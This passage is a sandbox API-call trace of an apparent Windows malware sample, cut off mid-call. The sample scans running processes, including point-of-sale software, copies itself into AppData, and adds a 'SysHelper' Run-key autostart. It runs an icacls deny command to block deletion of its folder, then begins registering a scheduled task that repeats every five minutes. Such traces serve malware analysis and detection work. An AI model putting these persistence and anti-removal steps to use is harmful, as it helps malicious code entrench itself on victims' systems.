bInheritHandle=0, dwProcessId=0xac8) returned 0x5bc [0066.999] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.001] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xbe0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0067.001] CloseHandle (hObject=0x5bc) returned 1 [0067.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad8) returned 0x5bc [0067.001] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.003] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0067.003] CloseHandle (hObject=0x5bc) returned 1 [0067.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae8) returned 0x5bc [0067.003] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.005] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x890000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0067.005] CloseHandle (hObject=0x5bc) returned 1 [0067.005] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf8) returned 0x5bc [0067.005] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.007] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0067.007] CloseHandle (hObject=0x5bc) returned 1 [0067.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb08) returned 0x5bc [0067.007] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.009] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xc60000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0067.009] CloseHandle (hObject=0x5bc) returned 1 [0067.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x5bc [0067.010] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.011] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xa20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0067.012] CloseHandle (hObject=0x5bc) returned 1 [0067.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x5bc [0067.012] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.013] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xbc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0067.014] CloseHandle (hObject=0x5bc) returned 1 [0067.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x5bc [0067.014] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.015] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0xf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0067.016] CloseHandle (hObject=0x5bc) returned 1 [0067.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x5bc [0067.016] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.018] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x200000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="church.exe") returned 0xa [0067.018] CloseHandle (hObject=0x5bc) returned 1 [0067.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x5bc [0067.018] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.020] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x1080000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="commonwealth.exe") returned 0x10 [0067.020] CloseHandle (hObject=0x5bc) returned 1 [0067.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x0 [0067.020] CloseHandle (hObject=0x0) returned 0 [0067.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x0 [0067.020] CloseHandle (hObject=0x0) returned 0 [0067.020] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb04) returned 0x5bc [0067.021] EnumProcessModules (in: hProcess=0x5bc, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0067.022] GetModuleBaseNameW (in: hProcess=0x5bc, hModule=0x400000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 0x2a [0067.022] CloseHandle (hObject=0x5bc) returned 1 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x269bd0 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x29d8b8 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31722c0 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31496a8 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x3139fd0 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x313a238 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x293cf0 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x293f58 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x31536f0 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x3153958 [0067.029] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x25c) returned 0x3153bc0 [0067.035] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18deb0 | out: phkResult=0x18deb0*=0x5bc) returned 0x0 [0067.036] RegQueryValueExW (in: hKey=0x5bc, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18deac, lpData=0x18c5d8, lpcbData=0x18de90*=0x400 | out: lpType=0x18deac*=0x0, lpData=0x18c5d8*=0x0, lpcbData=0x18de90*=0x400) returned 0x2 [0067.036] RegCloseKey (hKey=0x5bc) returned 0x0 [0067.036] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0067.037] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0067.037] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " [0067.037] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" ", pNumArgs=0x18de74 | out: pNumArgs=0x18de74) returned 0x31229c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0067.037] lstrcpyW (in: lpString1=0x18bdd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0067.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0067.037] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d5d8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0067.038] UuidCreate (in: Uuid=0x18de24 | out: Uuid=0x18de24) returned 0x0 [0067.038] UuidToStringW (in: Uuid=0x18de24, StringUuid=0x18deb8 | out: StringUuid=0x18deb8) returned 0x0 [0067.038] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x50) returned 0x3172740 [0067.038] RpcMgmtStatsVectorFree (in: StatsVector=0x18deb8 | out: StatsVector=0x18deb8) returned 0x0 [0067.038] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="dfa6d923-216a-4d3a-9d72-28b7181f1996" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996") returned 1 [0067.038] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\dfa6d923-216a-4d3a-9d72-28b7181f1996"), lpSecurityAttributes=0x0) returned 1 [0067.042] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb0) returned 0x3122a80 [0067.042] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xb0) returned 0x3122b38 [0067.043] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996", pMore="243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 1 [0067.043] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0 [0067.043] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243e.tmp.exe.del105265203.del105731312.exe"), bFailIfExists=0) returned 1 [0067.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18deb4 | out: phkResult=0x18deb4*=0x5c0) returned 0x0 [0067.110] lstrcpyW (in: lpString1=0x18cdd8, lpString2="\"" | out: lpString1="\"") returned="\"" [0067.111] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0067.111] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart" [0067.111] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart") returned 137 [0067.111] RegSetValueExW (in: hKey=0x5c0, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart", cbData=0x112 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart") returned 0x0 [0067.112] RegCloseKey (hKey=0x5c0) returned 0x0 [0067.112] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x100) returned 0x3106c40 [0067.112] SetLastError (dwErrCode=0x0) [0067.112] lstrcpyW (in: lpString1=0x18add8, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0067.112] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996" [0067.112] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0067.112] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18ddd8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18de34 | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18de34*(hProcess=0x5bc, hThread=0x5c0, dwProcessId=0x518, dwThreadId=0xa64)) returned 1 [0067.161] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.341] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.384] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.400] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.415] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.441] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.447] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.462] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.478] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.494] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.509] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.525] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x102 [0067.540] WaitForSingleObject (hHandle=0x5bc, dwMilliseconds=0x1) returned 0x0 [0067.541] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3122b38 | out: hHeap=0x240000) returned 1 [0067.541] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3172740 | out: hHeap=0x240000) returned 1 [0067.541] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x100) returned 0x31425c0 [0067.541] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x100) returned 0x31268d8 [0067.542] CoInitialize (pvReserved=0x0) returned 0x0 [0068.146] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0068.147] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x100) returned 0x3172528 [0068.147] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18de9c | out: ppv=0x18de9c*=0x28508e0) returned 0x0 [0068.421] TaskScheduler:ITaskService:Connect (This=0x28508e0, serverName=0x18d928*(varType=0x0, wReserved1=0x314, wReserved2=0x25b8, wReserved3=0x314, varVal1=0x7f, varVal2=0x100), user=0x18d938*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x108), domain=0x18d948*(varType=0x0, wReserved1=0x0, wReserved2=0x100, wReserved3=0x0, varVal1=0x7f, varVal2=0x7), password=0x18d958*(varType=0x0, wReserved1=0x315, wReserved2=0xde44, wReserved3=0x18, varVal1=0x420cab, varVal2=0x240000)) returned 0x0 [0068.428] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139220 [0068.428] TaskScheduler:ITaskService:GetFolder (in: This=0x28508e0, Path="\\", ppFolder=0x18dea4 | out: ppFolder=0x18dea4*=0x64ff98) returned 0x0 [0068.431] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139220 | out: hHeap=0x240000) returned 1 [0068.431] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139220 [0068.432] ITaskFolder:DeleteTask (This=0x64ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0068.434] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139220 | out: hHeap=0x240000) returned 1 [0068.434] TaskScheduler:ITaskService:NewTask (in: This=0x28508e0, flags=0x0, ppDefinition=0x18dea8 | out: ppDefinition=0x18dea8*=0x2850968) returned 0x0 [0068.454] TaskScheduler:IUnknown:Release (This=0x28508e0) returned 0x1 [0068.455] ITaskDefinition:get_RegistrationInfo (in: This=0x2850968, ppRegistrationInfo=0x18de7c | out: ppRegistrationInfo=0x18de7c*=0x2850a28) returned 0x0 [0068.455] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.455] IRegistrationInfo:put_Author (This=0x2850a28, Author="Author Name") returned 0x0 [0068.455] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.455] IUnknown:Release (This=0x2850a28) returned 0x1 [0068.455] ITaskDefinition:get_Principal (in: This=0x2850968, ppPrincipal=0x18de84 | out: ppPrincipal=0x18de84*=0x2850bb8) returned 0x0 [0068.455] IPrincipal:put_LogonType (This=0x2850bb8, LogonType=3) returned 0x0 [0068.455] IUnknown:Release (This=0x2850bb8) returned 0x1 [0068.455] ITaskDefinition:get_Settings (in: This=0x2850968, ppSettings=0x18de8c | out: ppSettings=0x18de8c*=0x2850ad8) returned 0x0 [0068.456] ITaskSettings:put_StartWhenAvailable (This=0x2850ad8, StartWhenAvailable=1) returned 0x0 [0068.456] IUnknown:Release (This=0x2850ad8) returned 0x1 [0068.456] ITaskSettings:get_IdleSettings (in: This=0x2850ad8, ppIdleSettings=0x18de70 | out: ppIdleSettings=0x18de70*=0x2850b48) returned 0x0 [0068.456] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.456] IIdleSettings:put_WaitTimeout (This=0x2850b48, WaitTimeout="PT5M") returned 0x0 [0068.456] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.456] IUnknown:Release (This=0x2850b48) returned 0x1 [0068.456] ITaskDefinition:get_Triggers (in: This=0x2850968, ppTriggers=0x18de6c | out: ppTriggers=0x18de6c*=0x2850a98) returned 0x0 [0068.456] ITriggerCollection:Create (in: This=0x2850a98, Type=1, ppTrigger=0x18de78 | out: ppTrigger=0x18de78*=0x2850c18) returned 0x0 [0068.457] IUnknown:Release (This=0x2850a98) returned 0x1 [0068.457] IUnknown:QueryInterface (in: This=0x2850c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18de94 | out: ppvObject=0x18de94*=0x2850c18) returned 0x0 [0068.457] IUnknown:Release (This=0x2850c18) returned 0x2 [0068.457] ITrigger:get_Repetition (in: This=0x2850c18, ppRepeat=0x18de80 | out: ppRepeat=0x18de80*=0x2850c68) returned 0x0 [0068.457] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.457] IRepetitionPattern:put_Interval (This=0x2850c68, Interval="PT5M") returned 0x0 [0068.457] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.457] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.457] IRepetitionPattern:put_Duration (This=0x2850c68, Duration="") returned 0x0 [0068.459] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.461] ITrigger:put_Repetition (This=0x2850c18, Repetition=0x2850c68) returned 0x0 [0068.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.461] ITrigger:put_Id (This=0x2850c18, Id="Trigger1") returned 0x0 [0068.461] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.461] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.461] ITrigger:put_EndBoundary (This=0x2850c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0068.461] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d954 | out: lpSystemTimeAsFileTime=0x18d954*(dwLowDateTime=0x964c74a0, dwHighDateTime=0x1d5d6b4)) [0068.470] GetLastError () returned 0x0 [0068.488] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x24) returned 0x3170908 [0068.497] GetLastError () returned 0x0 [0068.506] GetLastError () returned 0x0 [0068.515] GetLastError () returned 0x0 [0068.532] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0068.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d8bc | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d8bc) returned 26 [0068.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d8bc | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d8bc) returned 26 [0068.576] GetLastError () returned 0x0 [0068.576] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x24) returned 0x3170788 [0068.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x3170788, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0068.577] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xa0) returned 0x30f7ab8 [0068.577] GetLastError () returned 0x0 [0068.577] ITrigger:put_StartBoundary (This=0x2850c18, StartBoundary="2020-01-30T02:08:53") returned 0x0 [0068.577] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.577] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x31561d8 | out: hHeap=0x240000) returned 1 [0068.577] IUnknown:Release (This=0x2850c18) returned 0x1 [0068.577] ITaskDefinition:get_Actions (in: This=0x2850968, ppActions=0x18de88 | out: ppActions=0x18de88*=0x28509e0) returned 0x0 [0068.578] IActionCollection:Create (in: This=0x28509e0, Type=0, ppAction=0x18de74 | out: ppAction=0x18de74*=0x2850ca0) returned 0x0 [0068.581] IUnknown:Release (This=0x28509e0) returned 0x1 [0068.582] IUnknown:QueryInterface (in: This=0x2850ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18de90 | out: ppvObject=0x18de90*=0x2850ca0) returned 0x0 [0068.582] IUnknown:Release (This=0x2850ca0) returned 0x2 [0068.582] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xc) returned 0x3139268 [0068.582] IExecAction:put_Path (This=0x2850ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 0x0 [0068.582] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x3139268 | out: hHeap=0x240000) returned 1 [0068.583] RtlAllocateHeap 